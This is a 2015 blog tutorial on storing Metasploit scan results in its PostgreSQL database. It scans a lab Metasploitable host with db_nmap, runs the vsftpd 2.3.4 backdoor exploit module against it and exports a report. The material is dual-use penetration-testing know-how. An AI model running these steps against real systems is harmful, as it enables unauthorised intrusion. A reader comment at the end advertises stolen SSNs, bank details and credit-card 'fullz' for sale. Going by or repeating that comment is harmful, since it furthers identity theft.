Wednesday 17 June 2015

Metasploit: Using database to store results


It is always a better approach to store the results of penetration testing in a database. This helps us build a knowledge base about the hosts scanned , services running on the hosts, and vulnerabilities found on the hosts. Metasploit uses postgresql as the default database.


1) Start the services.
root@kali:~# service postgresql start
[ ok ] Starting PostgreSQL 9.1 database server: main.

root@kali:~# service metasploit start
Configuring Metasploit...
Creating metasploit database user 'msf3'...
Creating metasploit database 'msf3'...
insserv: warning: current start runlevel(s) (empty) of script `metasploit' overrides LSB defaults (2 3 4 5).
insserv: warning: current stop runlevel(s) (0 1 2 3 4 5 6) of script `metasploit' overrides LSB defaults (0 1 6).
[ ok ] Starting Metasploit rpc server: prosvc.
[ ok ] Starting Metasploit web server: thin.
[ ok ] Starting Metasploit worker: worker.


2) Start metasploit console.
root@kali:~# msfconsole
msf >


3) Check database status 
msf > db_status
[*] postgresql connected to msf3


4) Perform nmap scan through a database extension in Metasploit. This scan will automatically add all the details that are found to various sections of Metasploit.
msf > db_nmap -sV 192.168.122.73
[*] Nmap: Starting Nmap 6.47 ( http://nmap.org ) at 2015-06-17 11:12 IST
[*] Nmap: Nmap scan report for 192.168.122.73
[*] Nmap: Host is up (0.00030s latency).
[*] Nmap: Not shown: 977 closed ports
[*] Nmap: PORT     STATE SERVICE     VERSION
[*] Nmap: 21/tcp   open  ftp         vsftpd 2.3.4
[*] Nmap: 22/tcp   open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
[*] Nmap: 23/tcp   open  telnet      Linux telnetd
[*] Nmap: 25/tcp   open  smtp        Postfix smtpd
[*] Nmap: 53/tcp   open  domain      ISC BIND 9.4.2
[*] Nmap: 80/tcp   open  http        Apache httpd 2.2.8 ((Ubuntu) DAV/2)
[*] Nmap: 111/tcp  open  rpcbind     2 (RPC #100000)
[*] Nmap: 139/tcp  open  netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
[*] Nmap: 445/tcp  open  netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
[*] Nmap: 512/tcp  open  exec?
[*] Nmap: 513/tcp  open  login
[*] Nmap: 514/tcp  open  tcpwrapped
[*] Nmap: 1099/tcp open  rmiregistry GNU Classpath grmiregistry
[*] Nmap: 1524/tcp open  shell       Metasploitable root shell
[*] Nmap: 2049/tcp open  nfs         2-4 (RPC #100003)
[*] Nmap: 2121/tcp open  ftp         ProFTPD 1.3.1
[*] Nmap: 3306/tcp open  mysql       MySQL 5.0.51a-3ubuntu5
[*] Nmap: 5432/tcp open  postgresql  PostgreSQL DB 8.3.0 - 8.3.7
[*] Nmap: 5900/tcp open  vnc         VNC (protocol 3.3)
[*] Nmap: 6000/tcp open  X11         (access denied)
[*] Nmap: 6667/tcp open  irc         Unreal ircd
[*] Nmap: 8009/tcp open  ajp13       Apache Jserv (Protocol v1.3)
[*] Nmap: 8180/tcp open  http        Apache Tomcat/Coyote JSP engine 1.1
[*] Nmap: MAC Address: 00:0C:29:FA:DD:2A (VMware)
[*] Nmap: Service Info: Hosts:  metasploitable.localdomain, localhost, irc.Metasploitable.LAN; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
[*] Nmap: Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
[*] Nmap: Nmap done: 1 IP address (1 host up) scanned in 66.26 seconds
msf >

msf > db_nmap -O 192.168.122.73


4) Verify the hosts present in the database.
msf > hosts

Hosts
=====

address         mac                name  os_name  os_flavor  os_sp  purpose  info  comments
-------         ---                ----  -------  ---------  -----  -------  ----  --------
192.168.122.73  00:0c:29:fa:dd:2a        Linux               2.6.X  server      


5) View the services available on the hosts.
msf > services

Services
========

host            port  proto  name          state  info
----            ----  -----  ----          -----  ----
192.168.122.73  21    tcp    ftp           open   vsftpd 2.3.4
192.168.122.73  22    tcp    ssh           open   OpenSSH 4.7p1 Debian 8ubuntu1 protocol 2.0
192.168.122.73  23    tcp    telnet        open   Linux telnetd
192.168.122.73  25    tcp    smtp          open   Postfix smtpd
192.168.122.73  53    tcp    domain        open   ISC BIND 9.4.2
192.168.122.73  80    tcp    http          open   Apache httpd 2.2.8 (Ubuntu) DAV/2
192.168.122.73  111   tcp    rpcbind       open   2 RPC #100000
192.168.122.73  139   tcp    netbios-ssn   open   Samba smbd 3.X workgroup: WORKGROUP
192.168.122.73  445   tcp    microsoft-ds  open   Samba smbd 3.X workgroup: WORKGROUP
192.168.122.73  512   tcp    exec          open  
192.168.122.73  513   tcp    login         open  
192.168.122.73  514   tcp    shell         open  
192.168.122.73  1099  tcp    rmiregistry   open   GNU Classpath grmiregistry
192.168.122.73  1524  tcp    ingreslock    open   Metasploitable root shell
192.168.122.73  2049  tcp    nfs           open   2-4 RPC #100003
192.168.122.73  2121  tcp    ccproxy-ftp   open   ProFTPD 1.3.1
192.168.122.73  3306  tcp    mysql         open   MySQL 5.0.51a-3ubuntu5
192.168.122.73  5432  tcp    postgresql    open   PostgreSQL DB 8.3.0 - 8.3.7
192.168.122.73  5900  tcp    vnc           open   VNC protocol 3.3
192.168.122.73  6000  tcp    x11           open   access denied
192.168.122.73  6667  tcp    irc           open   Unreal ircd
192.168.122.73  8009  tcp    ajp13         open   Apache Jserv Protocol v1.3
192.168.122.73  8180  tcp    unknown       open   Apache Tomcat/Coyote JSP engine 1.1

msf >

6) Find and exploit 'vsftpd' vulnerability
msf > search vsftpd
msf > use exploit/unix/ftp/vsftpd_234_backdoor
msf exploit(vsftpd_234_backdoor) > show options
msf exploit(vsftpd_234_backdoor) > set RHOST 192.168.122.73
msf exploit(vsftpd_234_backdoor) > exploit


7) View vulnerabilities in database
msf > vulns
[*] Time: 2015-06-17 06:42:50 UTC Vuln: host=192.168.122.73 name=VSFTPD v2.3.4 Backdoor Command Execution refs=OSVDB-73573,URL-http://pastebin.com/AetT9sS5,URL-http://scarybeastsecurity.blogspot.com/2011/07/alert-vsftpd-download-backdoored.html



8) Generate XML report.
msf > db_export -f xml /root/report.xml
[*] Starting export of workspace default to /root/report.xml [ xml ]...
[*]     >> Starting export of report
[*]     >> Starting export of hosts
[*]     >> Starting export of events
[*]     >> Starting export of services
[*]     >> Starting export of web sites
[*]     >> Starting export of web pages
[*]     >> Starting export of web forms
[*]     >> Starting export of web vulns
[*]     >> Starting export of module details
[*]     >> Finished export of report
[*] Finished export of workspace default to /root/report.xml [ xml ]...




1 comment:

  1. Hey Guys !

    USA Fresh & Verified SSN Leads along with Driving License/ ID Number, AVAILABLE with 99.9% connectivity
    All Leads have genuine & valid information.

    **DETAILS IN LEADS**
    First Name | Last Name | SSN | Dob | Driving License Number | Address | City | State | Zip | Phone Number | Account Number | Payday | Bank Name | Employee Details | IP Address

    *Price for SSN lead $2
    *You can ask for sample before any deal
    *If anyone buy in bulk, we can negotiate
    *Sampling is just for serious buyers

    ==>ACTIVE, FRESH CC & CVV FULLZ AVAILABLE<==
    ->$5 PER EACH

    ->Hope for the long term Business
    ->Interested buyers will be welcome

    **Contact 24/7**
    Whatsapp > +923172721122
    Email > leads.sellers1212@gmail.com
    Telegram > @leadsupplier
    ICQ > 752822040

    ReplyDelete